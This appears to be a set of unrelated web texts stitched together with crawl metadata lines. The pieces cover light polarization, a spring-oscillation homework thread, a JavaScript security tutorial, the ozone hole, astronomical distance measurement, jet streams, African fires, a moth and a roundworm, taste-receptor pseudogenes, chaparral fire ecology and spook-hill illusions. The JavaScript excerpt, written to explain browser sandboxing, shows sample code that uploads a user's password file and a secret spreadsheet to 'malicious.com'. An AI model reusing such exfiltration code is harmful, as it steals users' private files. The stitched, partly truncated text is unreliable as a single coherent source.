orientation. If such a plastic is placed between two polarizing plates, a colorful pattern is revealed. As the top plate is turned, the color pattern changes as new colors become blocked and the formerly blocked colors are transmitted. A common Physics demonstration involves placing a plastic protractor between two Polaroid plates and placing them on top of an overhead projector. It is known that structural stress in plastic is signified at locations where there is a large concentration of colored bands. This location of stress is usually the location where structural failure will most likely occur. Perhaps you wish that a more careful stress analysis were performed on the plastic case of the CD that you recently purchased. Polarization is also used in the entertainment industry to produce and show 3-D movies. Three-dimensional movies are actually two movies being shown at the same time through two projectors. The two movies are filmed from two slightly different camera locations. Each individual movie is then projected from different sides of the audience onto a metal screen. The movies are projected through a polarizing filter. The polarizing filter used for the projector on the left may have its polarization axis aligned horizontally while the polarizing filter used for the projector on the right would have its polarization axis aligned vertically. Consequently, there are two slightly different movies being projected onto a screen. Each movie is cast by light that is polarized with an orientation perpendicular to the other movie. The audience then wears glasses that have two Polaroid filters. Each filter has a different polarization axis - one is horizontal and the other is vertical. The result of this arrangement of projectors and filters is that the left eye sees the movie that is projected from the right projector while the right eye sees the movie that is projected from the left projector. This gives the viewer a perception of depth. Our model of the polarization of light provides some substantial support for the wavelike nature of light. It would be extremely difficult to explain polarization phenomenon using a particle view of light. Polarization would only occur with a transverse wave. For this reason, polarization is one more reason why scientists believe that light exhibits wavelike behavior. In the demonstration, a polaroid filter is placed upon the glass panel of a classroom style overhead projector. Light passing through the filter becomes polarized. Different sectors of the taped glass will rotate the axes of polarization of the different wavelengths of light different amounts. A second filter is then placed over the taped glass. This second filter permits passage of wavelengths (i.e. colors) of light whose axis of polarization line up with the transmitting axis of the filter; other wavelengths are blocked. Thus, different sectors appear different colors when viewed through both filters. 1. Suppose that light passes through two Polaroid filters whose polarization axes are parallel to each other. What would be the result? 2. Light becomes partially polarized as it reflects off nonmetallic surfaces such as glass, water, or a road surface. The polarized light consists of waves vibrate in a plane that is ____________ (parallel, perpendicular) to the reflecting surface. 3. Consider the three pairs of sunglasses below. Identify the pair of glasses is capable of eliminating the glare resulting from sunlight reflecting off the calm waters of a lake? _________ Explain. (The polarization axes are shown by the straight lines.)
<urn:uuid:635353cd-795f-4736-ab20-12c94ed8699a>
3.546875
3,152
Tutorial
Science & Tech.
34.857531
|Mar31-10, 08:14 PM||#1| simple harmonic oscillation 1. The problem statement, all variables and given/known data A block of mass 5 kg is attached to a spring of 2000N/m and compressed a distance of 0.6m. The spring is then released and oscillates. a. what are the period, frequency, and angular frequency b. what is the energy in this system c. what is the maximum velocity 2. Relevant equations d^2x/dt^2 + (k/m)x = 0 [tex]\omega[/tex]= (2*pi)*frequency= 2pi/period= sqrt(k/m) E= 1/2mv^2 + 1/2kx^2= 1/2kA^2 3. The attempt at a solution I have not been able to attempt a solution because I do not know where to start. Please help. |Mar31-10, 08:26 PM||#2| you have all your equations and all your variables needed to find your unknowns.. if omega = sqrt (K/m) then you can find period and frequency, angular frequency from there. Energy of a spring is defined as.. 1/2 kx^2 max velocity is when potential spring energy = kinetic energy, (equilibrium point) |Similar Threads for: simple harmonic oscillation| |Simple Harmonic Oscillation||Advanced Physics Homework||3| |Simple harmonic oscillation||Introductory Physics Homework||1| |hello, can anybody help me ? one question about simple harmonic oscillation||Introductory Physics Homework||1| |Simple harmonic oscillation question||Introductory Physics Homework||2| |simple harmonic oscillation||Introductory Physics Homework||1|
<urn:uuid:79231551-bed6-4a90-8f81-14ee9400fe02>
3.078125
398
Comment Section
Science & Tech.
64.284118
See chapter 1 of the book. This list is not complete. So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do. var security_hazard = connection.open('malicious.com'); security_hazard.upload(filesystem.read('/my/password/file')); security_hazard.upload(filesystem.read('/ultra_secret/loans.xls')); document.forms.upload_field.value = '/my/password/file'; document.forms.submit(); Hence the feared browser incompatibilities. It’s best to solve compatibility problems on a case–by–case basis. In fact, most pages on this site have been written precisely because of browser incompatibilities. So read on to understand more. But I warn you: you need to digest quite a lot of information. Therefore it’s best to solve the problem at hand and leave the rest of the information alone until you need it. In addition, specifying side effects that are too complicated to explain right now. Then how do you determine whether a browser can handle your script? The basic rule is: don’t use a browser detect, use an object detect.
<urn:uuid:b0d30013-5347-4894-9a7d-8df07fe84052>
2.828125
278
Tutorial
Software Dev.
50.2522
Oct. 22, 2007 Although the ozone layer over the Antarctic this year is relatively small, this is due to mild temperatures in the region’s stratosphere this winter and is not a sign of recovery, the United Nations World Meteorological Organization (WMO) has said. Since 1998, only the ozone holes of 2002 and 2004 have been smaller than this year’s – both in terms of area and amount of destroyed ozone – and this is not indicative of ozone recuperation, the agency said. Instead, it is due to mild temperatures in the stratosphere, which still contains sufficient chlorine and bromine to completely destroy ozone in the 14-21 kilometer altitude range. The amount of gases which diminish ozone in the Antarctic stratosphere peaked around the year 2000. However, despite the decline in the amount by 1 per cent annually, enough chlorine and bromine will be in the stratosphere for another decade or two, which could result in severe ozone holes, WMO said. The size of the ozone hole will also be determined by the stratosphere’s meteorological conditions during the Antarctic winter. As greenhouse gases accumulate in the atmosphere, temperatures will fall in the stratosphere, increasing the threat of severe ozone holes in the future. Other social bookmarking and sharing tools: Note: Materials may be edited for content and length. For further information, please contact the source cited above. Note: If no author is given, the source is cited instead.
<urn:uuid:e42a443b-72eb-4b4b-8bd8-b319f16fa357>
3.796875
304
Truncated
Science & Tech.
33.280563
Jay M. Pasachoff is Field Memorial Professor of Astronomy at Williams College in Massachusetts. He sent this answer: "Trigonometric parallax--the tiny, apparent back-and-forth shifts of nearby stars caused by our changing perspective as the earth orbits the sun--can indeed be used to measure distances only to comparatively nearby stars. Some of the best data on stellar positions in the sky come from Hipparcos, a spacecraft launched in 1989 by the European Space Agency. Hipparcos has measured the trigonometric parallaxes of about 10,000 stars to an accuracy of better than 10 percent, out to a distance of about 300 light-years. But our galaxy is about 100,000 light-years across, so parallax measurements become useless long before we approach the distances to other galaxies. "The traditional way to measure distances to nearby galaxies is by studying variable stars, especially a type of bright variable star known as a Cepheid variable. Early in this century Henrietta Swan Leavitt discovered that the longer the period of variation of a Cepheid variable, the greater its luminosity. Another American astronomer, Harlow Shapley, then was able to correlate the brightnesses of Cepheids with those of known types of ordinary stars, tying Leavitt's relative distance scale to an absolute one. Thus, we can observe a Cepheid, note how long it takes for its brightness to vary and plot that information on an already established graph to find out its intrinsic luminosity. Comparing this true brightness (its 'absolute magnitude') with its apparent brightness as seen in the sky (its 'apparent magnitude') allows us to calculate how far away it is, using the inverse-square law of brightness. "Fortunately, Cepheids are luminous enough that they can be observed in other galaxies, not just in our own. In the 1920s Edwin Hubble used the period-luminosity relation for variable stars to establish the distances to various galaxies and proved that they lie far outside our Milky Way. In the course of that work, he discovered what we now call 'Hubble's law,' that galaxies display a linear relation between distance and redshift (the redshift is the shift in the positions of lines in the galaxies' spectra toward the red end of the rainbow). Hubble's law is the basis for the modern understanding that we live in an expanding universe. After measuring the redshift, which we can do by passing a galaxy's light through a spectrogram, we can deduce the distance using Hubble's law. This technique is the astronomer's basic tool for finding the distances to the farthest things in the universe. "But of course there are many complications. Maybe the relation between redshift and distance is not quite linear when we get very far out in the universe. Maybe there are giant concentrations of mass that distort what is otherwise thought to be a smooth, outward expansion, or 'Hubble flow.' Maybe the expansion of the universe inferred by Hubble is accelerated by a 'cosmological constant' in Einstein's equations, the solutions of which are the basis for theoretical cosmology. And measurements of the rate of the cosmic expansion remain controversial. The Hubble Space Telescope is in the process of observing a large set of Cepheid variables in distant galaxies in order to resolve this question. "Cosmologists are also turning their attention to other bright objects that can be seen at great distances as a way of verifying the accuracy of their measurements. A certain kind of exploding star, or supernova (called a Type Ia supernova), always seems to have the same peak luminosity, so these supernovae can be used as 'standard candles' instead of Cepheids. Supernovae are billions of times brighter than Cepheids; as a result, they can be observed at far greater distances. A number of researchers are trying to exploit this advantage and get more accurate information about the size and age of the universe. The Hubble Space Telescope is assisting in this work as well.
<urn:uuid:94ed3fd6-a6fc-4508-9672-3fd165fdea7c>
4.3125
825
Knowledge Article
Science & Tech.
34.799968
Carbon nanotube springs could herald a new era of energy storage Sincethe system would store energy in a spring, it won’t lose any chargeover time and could potentially be used endlessly to store energy,without any loss in performance. The nanotube springs could store about1000 times the energy of steel springs, and offer an energy-densitycomparable to the best lithium-ion batteries. Whileconventional batteries need to be recharged frequently to ensure thatthey have full power when the need arises, the carbon nanotube springscan be used to store energy for a longer period of time without theneed of a recharge. Moreover, since the springs will belightweight, they won’t add much weight to the system, which eventuallywill enhance their performance. Unlike lithium ion batteries also needspecific conditions to work, the carbon nanotube springs aren’tdependent on the environmental conditions as well. Image Courtesy: Wikipedia 'EcoFriend' is an environmental blog. The idea behind EcoFriend is simple: to inform and educate consumers who love to possess the latest gadgets and products available in the market and who are also concerned about the environment around them. Search 26k+ Solar Articles - Top 5 Ways The U.S Military is Utililizing Renewable Energy - New Solar Technology to Increase Efficiency - The Rise Of The Green Machines - Solar Savings: Tax Credits and Solar - Australian Scientists Printing Solar Cells Down Under - Why are Auto Dealers Hating on Tesla? - Ernie Moniz To Lead the U.S. DOE - Glass and Green Building - How China Will Transform The Energy Industry - New Project Will Forecast Solar Generation - In Focus: The Potential of Los Angeles Solar - Tesla Reports Profit, Stock SKYROCKETS
<urn:uuid:05317741-ef16-495e-bfc6-a9bef32c1f1d>
3.15625
376
Truncated
Science & Tech.
23.954417
Jet streams are fast-moving rivers of air in the upper levels of the atmosphere. You may have heard about jet streams on television, where weathercasters track their paths on weather maps. Weather forecasters pay lots of attention to the positions of the jet streams because they are the boundary between warm and cold air and have much to do with how weather systems form. Jet streams have a strong effect on weather because they steer movement of high and low pressure systems, and block the movement of upper level moisture and energy. Jet streams do not usually move in straight paths; the path of a jet stream typically has a meandering shape. Each large curve or meander of the jet stream is known as a Rossby wave. Jet streams follow the boundaries between hot and cold air. Since the temperature changes in the atmosphere are greatest around 30° and around 50°–60° in the Northern and Southern Hemispheres, this is where the jet streams form. The major Northern Hemisphere jet streams are the polar jet, which forms at 50°–60° north latitude, and the subtropical jet, near 30° north latitude. The strength and position of the polar jet is important because most large winter storm systems form and move along the polar jet. In the Northern Hemisphere in the winter, areas may get colder than normal periods as the polar jet stream dips south, bringing cold air in from Arctic regions. A climate study conducted between 1979 and 2001 found that the positions of the jet streams in both the Northern and Southern Hemispheres have shifted toward the poles, a trend some scientists believe will continue. This change of position is important to projecting future climate conditions because it may affect the formation and severity of storms in mid-latitude regions. Jet streams over sub-tropical regions typically slow the development of hurricanes, therefore the movement of jet streams away from these regions may result in more frequent and severe hurricanes. The tracks that storms follow will also change as a result of shifting positions of the jet streams. Scientists are currently studying why the positions of the jet streams are changing. It may be due to natural patterns of variation, to human impacts on the climate system, or to a combination of the two. Here are suggested ways to engage students with this video and with activities related to this topic. Academic standards correlations on Teachers' Domain use the Achievement Standards Network (ASN) database of state and national standards, provided to NSDL projects courtesy of JES & Co. We assign reference terms to each statement within a standards document and to each media resource, and correlations are based upon matches of these terms for a given grade band. If a particular standards document of interest to you is not displayed yet, it most likely has not yet been processed by ASN or by Teachers' Domain. We will be adding social studies and arts correlations over the coming year, and also will be increasing the specificity of alignment.
<urn:uuid:a4971e39-600a-4d13-bfbc-9fa3e615c1c4>
4.59375
587
Knowledge Article
Science & Tech.
44.673712
This section is for the benefit of those new to the growing field of applied geophysics. The success of all geophysical methods relies on there being a measureable contrast between the physical properties of the target and those of the surrounding medium. The properties used are typically density, elasticity, magnetic susceptibility, electrical conductivity, and radioactivity. Knowledge of the material properties likely to be associated with a target is thus essential to guide the selection of the correct method to be used and to interpret the results obtained. Often a combination of methods provides the best means of solving complex problems.
<urn:uuid:482ca434-cc93-4c6a-a05f-d709109119d3>
3.21875
119
Knowledge Article
Science & Tech.
21.565
Fires in Zambia, Africa Managing wildlfire is a difficult business but it is pretty much the same the world over. In order to prevent future fires you need to start small controlled fires to get rid of what wildfires can use as fuel in areas you really don't want burned. Recently personnel from the U.S. Forest Service have been teaching fire monitoring to personnel in Zambia’s Kafue National Park. Kafue National Reserve is more than twice the size of Yellowstone. Fire plays a big role in maintaining a healthy ecosystem because you want to control the spread of fire across the region and contain it as best you can. This is done by purposely igniting fires just after the wet season, removing most of the fuel before the land really dries out. Early-season fires, when the ground is still wet, have few negative ecological effects; however the dry-season fires tend to burn intensely and uncontrollably. This pattern is significantly reducing shrub cover across Kafue, which provides essential wildlife habitat. The information presented above was taken from a USDA blog dated August 30, 2012. The fires seen in this image may well be intentionally set fires in order to burn out areas which may have fueled future wildfires. This natural-color satellite image shows smoke streaming from fires across Zambia. It was collected by the Moderate Resolution Imaging Spectroradiometer (MODIS) aboard the Aqua satellite on September 02, 2012. Actively burning areas, detected by MODIS’s thermal bands, are outlined in red. NASA image courtesy Jeff Schmaltz LANCE/EOSDIS MODIS Rapid Response Team, GSFC. Caption by Lynn Jenner.
<urn:uuid:fe77c417-f863-44fd-b8b8-81a1f970f0a6>
3.484375
344
Knowledge Article
Science & Tech.
41.121865
Scientific name: Shargacucullia lychnitis Flies at night in June and July. Similar to the Mullein (S. verbasci), but typically smaller and lighter, the Mullein flying from late April to May. The larvae of both species are also superficially similar, the Mullein having black spotting between each segment, whereas Striped Lychnis larvae generally have a clear band of pale green between each segment. Striped Lychnis feeds from July to mid September, whereas that of the Mullein feeds from late May to July. - Medium Sized - Wing Span Range (male to female) - 42-47mm - UK BAP: Priority Species - Nationally Scarce The larva usually feeds on the flowers and can readily be found by day; July to mid Spetember. Overwinters as a pupa, on or just below the ground surface. Particular Caterpillar Food Plants Dark Mullein (Verbascum nigrum), but has been reported on White Mullein (V. lychnitis) and ornamental mulleins in gardens - Countries – England - Local in southern England, being found in West Sussex, Hampshire, Berkshire, Buckinghamshire and Oxfordshire. Also once recently in Wiltshire. Formerly found in some other parts of southern England. - Distribution Trend Since 1970’s = Britain: Declining Roadside verges, embankments, field margins, rough downland, and also woodland rides and clearings. Usually in un-shaded situations.
<urn:uuid:ee1c1a9c-7265-41bd-a4aa-ace279e066fc>
3.1875
329
Knowledge Article
Science & Tech.
41.789326
#include <deque> void push_back( const TYPE& val ); The push_back() function appends val to the end of the deque. For example, the following code puts 10 integers into a deque: deque<int> dq; for( int i = 0; i < 10; i++ ) dq.push_back( i ); When displayed, the resulting deque would look like this: 0 1 2 3 4 5 6 7 8 9 push_back() runs in constant time.
<urn:uuid:b15ee3c1-f85f-4d81-9011-4bcb2da05270>
2.71875
114
Documentation
Software Dev.
83.241364
statement_listEND LOOP [ LOOP implements a simple loop construct, enabling repeated execution of the statement list, which consists of one or more statements, each terminated by a ;) statement delimiter. The statements within the loop are repeated until the loop is terminated. Usually, this is accomplished with a LEAVE statement. Within a stored RETURN can also be used, which exits the function entirely. Neglecting to include a loop-termination statement results in an infinite loop. CREATE PROCEDURE doiterate(p1 INT) BEGIN label1: LOOP SET p1 = p1 + 1; IF p1 < 10 THEN ITERATE label1; END IF; LEAVE label1; END LOOP label1; SET @x = p1; END;
<urn:uuid:20f65d34-823e-4e74-ac51-567b385a26b0>
3.015625
176
Documentation
Software Dev.
36.005471
As a teenager I found it hard to picture the 3D structure of DNA, proteins and other molecules. Remember we didn’t have a computer then, no videos, nor 3D-pictures or 3D models. I tried to fill the gap, by making DNA-molecules of (used) matches and colored clay, based on descriptions in dry (and dull 2D) textbooks, but you can imagine that these creative 3D clay figures beard little resemblance to the real molecular structures. But luckily things have changed over the last 40 years. Not only do we have computers and videos, there are also ready-made molecular models, specially designed for education. O, how I wished, my chemistry teachers would have had those DNA-(starters)-kits. Hattip: Joanne Manaster @sciencegoddess on Twitter: Curious? Here is the Products Catalog of http://3dmoleculardesigns.com/news2.php Of course, such “synthesis” (copying) of existing molecules -though very useful for educational purposes- is overshadowed by the recent “CREATION of molecules other than DNA and RNA [xeno-nucleic acids (XNAs)], that can be used to store and propagate information and have the capacity for Darwinian evolution. But that is quite a different story. - Friday Foolery #49: The Shortest Abstract Ever! (laikaspoetnik.wordpress.com) - Synthetic DNA substitute gets its own enzymes, undergoes evolution (arstechnica.com) - DNA Alternative Created By Scientists (freeinternetpress.com) - Evolution seen in ‘synthetic DNA’ (talesfromthelou.wordpress.com)
<urn:uuid:cd8f2746-e0be-4f53-b3da-f09fe4455fef>
3.421875
376
Personal Blog
Science & Tech.
40.362544
Creating and Accessing Web Services Walkthroughs Web services provide programmatic access to application logic using standard Web protocols, such as XML and HTTP. Web services can be either stand-alone applications or sub-components of a larger Web application. Web services are accessible from just about any other kind of application, including other Web services, Web applications, Windows applications and console applications. The only requirement is that the client must be able to send, receive, and process messages to and from the Web service. For more information, see Programming the Web with Web Services. These walkthroughs cover two logically separate development paths, creating Web services and accessing Web services. Although you may be both the creator and the user of a particular Web service, the processes are distinctly separate. Of course, you need to create a Web service before you can access it. The creating Web services walkthroughs use two separate technologies for implementing a Web service. In all cases, you create the same Web service functionality; the only difference is the method of implementation. The accessing Web services walkthroughs focus on the steps necessary to access Web services from managed code and unmanaged code. In each walkthrough, the client application accesses the Web service using a proxy class generated by Visual Studio. In each walkthrough you will access a Web service created in one of the above "Creating a Web Service..." walkthroughs. As such, it is necessary to complete at least one of the "Creating a Web Service..." walkthroughs prior to attempting one of the "Accessing a Web Service..." walkthroughs.
<urn:uuid:31632f8c-d61e-4098-9516-7687ee0c0c50>
2.84375
324
Tutorial
Software Dev.
38.434198
Marine Wildlife Encyclopedia Roundworm Dolicholaimus marioni It is hard to see which end is which on a roundworm, as both ends of its thin body are pointed. The body is round in cross-section and has longitudinal muscles but no circular ones. This results in a characteristic way of moving in which the body is thrashed in a single plane forming C- or S-shapes in the process. This is a marine species, but roundworms also occur in vast numbers in the soil and fresh water. - Phylum Nematoda - Length Up to in (5 mm) - Depth Intertidal - Habitat Among algae in rock pools - Distribution Shores of the northeastern Atlantic
<urn:uuid:1994bb24-77ac-40fe-b11c-72126b68bf72>
3.609375
150
Knowledge Article
Science & Tech.
43.913333
Pseudogenes are genes that used to have a function, but no longer do. If a gene contributes to an important function for the organism, offspring with deleterious mutations that ruin the gene will have lower fitness, and as a result won't have as many offspring, if any at all. That mutated gene will likely not go to fixation (become prominent in the population). On the other hand, if the gene used to have a function, but no longer don't, then mutations affecting the gene won't be deleterious. Mutations that turn off its expression (so the protein the gene codes for is no longer produced), and mutations that mess up the amino-acid sequence of the protein (so the protein can't carry out the previous function), won't be detrimental to the individual that has those mutations if the individual no longer needs that function. As a result, those mutations can go to fixation either by genetic drift (i.e., at random), or can even be selected for (e.g., when there is a cost to producing the proteins). However, examples where pseudogenization is coupled to function is rare. A new study published in PNAS links genes that code for taste receptors to specific dietary changes in carnivorous mammals. Basically, animals that do not eat sweets don't have receptors for sweetness (e.g., cats), and animals that swallows their food whole have no receptors for umami (e.g., sea lions, dolphins). Mutations causing loss of the sweet-taste receptor gene are in red. The exons (DNA coding for a protein) are intact for dog, which can taste sweet just fine, compared to the exons for various other carnivores which cannot taste sweet, the poor souls. Examples of what the mutations actually do. Looks like they typically cause frameshifts, which makes the rest of the gene nonsense, and introduces stop codons, which causes transcription to stop prematurely. The first one, with Sea and Fur Seals, shows a mutation that messes up the promoter region of the gene, thereby ruining gene expression. Phylogenetic tree showing loss (diamonds) of Tas1R2, one of the genes coding for a protein that enables animals to taste sweet. In this way, several species have lost taste-receptors, and they have done so independently. The Fossa of Madagascar™ have lost the gene for the sweet-taste, but their most close relative examined, the Yellow Mongoose, have not. The red diamonds in the this phylogenetic tree indicates in which the gene for sweet taste has become a pesudogene. The results strongly suggest that loss of the gene has occurred multiple times, rather than once in a common ancestor. Measuring the strength of selection along these branches, the authors found that the ratio of non-synonymous to synonymous substitutions, dN/dS (aka ω) is considerably lower for the species that can still taste sweet, compared to those that can't. An ω lower than one means that mutations that change the amino acid sequence aren't tolerated, while those that don't (the synonymous mutations) are. So this lower ratio means is that there is strong purifying selection on the gene when the gene is still in use, whereas when ω is higher, selection doesn't care much about the gene. However, the best model fit was one where the branches leading to species with intact taste-receptors had ω=0.13656, while the others had ω=0.41974. That is, while the latter is found to have been under relaxed selection compared to the former, the fact that ω isn't (close to) 1 suggest that it selection isn't wholly indifferent to the state of the protein. The authors themselves are at a loss as to the nature of this mechanism: Recently, sweet, umami, and bitter taste receptors have been implicated in several extraoral functions (36). Pseudogenization of Tas1r receptor genes in dolphins and sea lions and Tas2r receptor genes in dolphin indicates that these receptors cannot be involved in extraoral (e.g., gut, pancreas) chemosensation (36) in these species. Thus, to the extent that these extraoral taste receptors are functionally significant in rodents and humans, these functions must have been assumed by other mechanisms in the species we have identified here with pseudogenized receptors. What these other mechanisms are remains to be determined, and further assessment of the relationships among taste receptor structure, dietary choice, and the associated metabolic pathways will lead to a better understanding of the evolution of diet and food choice as well as their mechanisms. One of the species in the order Carnivora is the Banded Linsang, which lives in tropical forests of Thailand, Malaysia, Borneo, and Java. I include a picture of it here just because I have never seen this creature before, and because it is super adorable. It is a close relative of cats, and cannot taste sweet. Jiang P, Josue J, Li X, Glaser D, Li W, Brand JG, Margolskee RF, Reed DR, & Beauchamp GK (2012). Major taste loss in carnivorous mammals. Proceedings of the National Academy of Sciences of the United States of America PMID: 22411809
<urn:uuid:6a1119ca-a9da-4519-b421-7807e88791d8>
3.546875
1,102
Academic Writing
Science & Tech.
46.716962
EXPLANATION OF PLAN CHECK The purpose of this plot is to check for sun danger, estimate SEPS cumulative sun exposure time, and gauge how well the modeled magnetic field lies in the SEPS field of view. - The absolute value of the pitch angle difference between the boresight and the sun vector is shown in the top panel. When the absolute value of the sun latitude is less than or equal to 20 degrees and the difference in pitch angle is less than 24 degrees a sun violation message occurs. The dashed horizontal line indicates the SEPS anti-boresight violation zone. - The middle panel indicates the cumulative SEPS sun exposure time. - The bottom panel indicates the angle between the boresight direction and the Earth centered dipole magnetic field. Scott Boardsen, firstname.lastname@example.org Last updated on April 30, 1996
<urn:uuid:b7850c01-a071-4c3b-9f07-4ea3c12fea7f>
2.921875
186
Documentation
Science & Tech.
41.301533
In 2002 and 2003, over 1500 square miles of southern California burned in firestorms unequaled for over a century, the largest fires since accurate records have been kept. Because of the fires’ unprecedented size, their effects on the ecosystem were unknown and unpredictable. Over 738 square miles burned in San Diego County alone, 17.4% of the county’s total area and nearly 25% of the area still covered by natural vegetation. The Cedar fire of October 2003 alone burned 436.4 square miles and was the single most pervasive disaster in San Diego history. The fires killed 17 people, compelled the evacuation of thousands, burned 2454 houses, blanketed the region under dense smoke for a week, and shut the business of the city of San Diego down for two days. Areas burned in San Diego County in 2002 and 2003 These wildfires also reignited the debate among resource managers, politicians, scientists, and the public about the strategies appropriate for people to live in the fire-prone ecosystems of southern California. This debate among vegetation and fire ecologists began in the early 1980s (Keeley 1982, Minnich 1982, Minnich and Chou 1996, Keeley 2002) but has now sprung to the forefront of the public eye and resource managers’ needs. Developing fire-management strategies in southern California, particularly in coastal sage scrub and chaparral, is particularly difficult because the area is a biodiversity hotspot and supports a large number of threatened and endangered species. Guidelines for prescribed fires must minimize their effect on a wide array of species while simultaneously helping to prevent fires that might threaten lives and property. Such guidelines can be developed only with detailed information on species’ responses to fire and subsequent patterns of recovery. Yet in spite of the central role of fire in the southern California’s biology, few studies have addressed the responses of any vertebrate to fire, and little is known about how animals recover following fire or what interventions, if any, may be necessary to assist ecological recovery following fire. Our team has two studies focused on understanding mammals’ responses to fire. One, in chaparral in the Cleveland National Forest, is examining how rodents and other small mammals, carnivores, and bats recover from fire, with a special emphasis on how proximity to unburned habitat and fire severity influence recovery. The other study, in coastal sage scrub in Rancho Jamul Ecological Reserve, addresses rodents’ responses to fire, taking into account the influence of the abundance of exotic plants before and after fire. Our results will ultimately aid the responsible authorities in designing guidelines for how to prepare for fire. The influence of fire severity on mammals’ recovery can be incorporated into considerations regarding fuel status and fire weather before a fire breaks out. The temporal and spatial patterns of mammal recovery can be used to guide minimum fire intervals as well as maximum fire sizes in plans for controlled fires. The effects of the abundance of exotic plants, which may be enhanced by frequent fire, can be used to guide postfire management interventions to assist recovery. As a whole, the information resulting from these studies will aid planning for fire management with the minimum effect on southern California’s mammals. In 2002, the San Diego Natural History Museum began a series of studies on the effects of fire on the birds and mammals of San Diego County. These studies were funded by California State Parks, the Joint Fire Science Program, and the U.S. Forest Service. We are currently synthesizing the results from these studies in ways to inform monitoring and adaptive management techniques and strategies. This project is funded by a grant from the Blasker Environment Grant Program of the San Diego Foundation.
<urn:uuid:ab9cef0a-d0d2-4f29-b58f-793f491fe53f>
3.765625
746
Academic Writing
Science & Tech.
26.198883
In ecology, predation describes a relationship and actions between two creatures. A predator attacks and eats its prey. Predators may or may not kill their prey before eating them. But the act of predation always causes the death of its prey and taking in the prey's body parts into the predators body. A true predator can be thought of as one which both kills and eats another animal. A predator is an animal that hunts, catches and eats other animals. For example, a spider eating a fly caught at its web is a predator, or a pack of lions eating a buffalo. The animals that the predator hunts are called prey. Predators are usually carnivores (meat-eaters) or omnivores (eats plants and other animals). Predators will hunt other animals for food. Examples for predators are lions, tigers, Leopards, crocodiles, snakes, eagles, wolves, killer whales, and sharks. Predators are usually defined as animals that eat other animals. But to some scientists, the word predator means an animal or any living organism that eats anything. A cow eating grass will be a predator of that grass. Plants are not predators because they make their own food. However, there are different characteristics in both predator or prey. A lioness with her prey.
<urn:uuid:fcbb6cd8-eb08-47d8-aecd-78f0dc44a9c9>
3.671875
264
Knowledge Article
Science & Tech.
52.49105
Spook Hills in the Lab Spook hills, also known as antigravity or magnetic hills, are natural places where cars in neutral gear seem to move uphill on a slightly sloping road, seemingly defying the laws of gravity. The phenomenon, found all over the world, has long kept both paranormal believers and skeptics wondering. Some have suggested as explanation for the strange occurrence that magnetic or gravitational anomalies exist due to mysterious magnetic sources underground or secret military experiments. Magnetic causes can be ruled out easily, though, because effects are visible even on nonmagnetic materials, such as plastic balls or water poured on the ground. The answer to this mystery is found using a simple tool. When the inclination of several such roads has been measured using spirit levels, the actual slope of the surface has consistently been found to be opposite to the apparent one. To answer the objection that gravitational anomalies would influence the level as well, my good friend and longtime colleague Luigi Garlaschelli, from the University of Pavia in Italy, also took measurements on an Italian spook hill in Montagnaga (Figure 1) from a distance (i.e., away from the stretch of road in question) using a professional surveyor’s instrument called a theodolite. The parallelism between a plumb line hanging within the critical area and another outside of it was first checked by Garlaschelli, then height quotes were taken on graduated yardsticks. The real slope was calculated at about 1 percent of the apparent slope in the opposite direction. The simpler explanation for spook hills, then, is that they are visual illusions in a natural environment. A Portable Spook Hill Experiment Recently, Garlaschelli, along with Paola Bressan, a researcher at the Department of Psychology at the University of Padua, and Monica Barracano, also of Padua, published a report on spook hills in Psychological Science, the journal of the Association for Psychological Science (previously known as the American Psychological Society). In the article, they describe four experiments showing that this phenomenon can be reproduced in a laboratory. The researchers find that the phenomenon is due to the visual anchoring of the spooky surface to a gravity-relative eye level whose perceived direction is biased by sloping surroundings. In the first experiment, for example, they built a tabletop model with three hinged, moveable boards (Figure 2) to investigate the case in which the critical spot is a sloping stretch of road between two other stretches that both run either uphill or downhill as one moves forward from the observation point at one end. Because their model was 2.4 meters long, devoid of visible texture, and viewed monocularly through a reduction screen, most depth cues (aerial perspective, texture gradients, and binocular cues such as disparity and convergence) were absent. Figure 2: Schematic illustration of the tabletop model used in Experiment 1 (L is where the hole was located and in N there are a few small model trees to add to the realism of the scenery). Sixty undergraduate students were divided into three groups of twenty subjects each, with each group seeing two or three of the eight different levels of inclination. All subjects were unaware of the actual setup and purpose of the experiment. In the experiment, the subjects sat in front of the screen one at a time. They were asked to look into a hole and describe what they saw and then assess the slope of the three stretches on a five-point scale that ran from strongly downhill to strongly uphill. Each trial was followed by a break of about one minute, during which the hole was occluded and the model modified. The results of the experiment showed that slants are generally underestimated. Three stretches with the same slant were seen as horizontal by all subjects, whether they were truly horizontal, downhill, or uphill. A slightly downhill stretch between two strongly downhill inclines was seen as illusorily uphill by sixteen out of twenty subjects and as illusorily horizontal by the other four. This illusory effect explains what occurs at Gravity Hill in Pennsylvania. However, a slightly uphill stretch between two strongly uphill inclines was seen by all subjects as level, not as downhill as might be expected in light of the previous finding. This result implies that inducing an illusory downhill effect is not nearly as easy as inducing an illusory uphill effect. In a further experiment, Garlaschelli and his team found that steeper inducing slopes are required to suggest an uphill slant. “After each observer’s task was concluded,” say Bressan and her colleagues, “we placed a small roll of tape on the misperceived slope, and the tape appeared to move against the law of gravity, producing surprise and, on occasion, reverential fear.” Interested readers can find details on the team’s various experiments in the September 2003 (14:5) issue of Psychological Science. Experience the Spooky Effect “The visual (and psychological) effects obtained in our experiments were in all respects analogous to those experienced on site,” the researchers concluded. “The more than twenty natural cases of antigravity hills reported to date are all variations on a single theme. Our study shows that the phenomenon can be recreated artificially, with no intervention whatsoever of magnetic, antigravitational, or otherwise mysterious forces. The spooky effects experienced at these sites are the outcome of a visual illusion due to the inclination of a surface being judged relative to an estimated eye level that is mistakenly regarded as normal to the direction of gravity. Using miniature or even life-size reproductions of our tabletop models, it should now be easy to re-create the fascination of this challenge to gravity in amusement parks and, for twice the benefit, science museums anywhere. If you’d like to experience a spook hill for yourself, Bressan and colleagues have prepared this list of the best known ones: - United States: Confusion Hill, Idlewild Park, Ligonier, Pennsylvania; Gravity Hill, northwest Baltimore County, Maryland; Gravity Hill, State Route 42, Mooresville, Indiana; Gravity Hill, State Route 96, south of New Paris, Bedford County, Pennsylvania; Gravity Hill, White’s Hill, Rennick Road, La Fayette County, Wisconsin; Gravity Road, Ewing Road, Route 208, Franklin Lakes, Washington; Mystery Hill, Highway 321, Blowing Rock, North Carolina; Mystery Spot, Putney Road, Benzie County, Michigan; Spook Hill, North Wales Drive, North Avenue, Lake Wales, Florida; Spook Hill, Gapland Road, Burkittsville, Frederick County, Maryland - Canada: Gravity Hill, McKee Road, Ledgeview Golf Course, Abbotsford, British Columbia; Magnetic Hill, 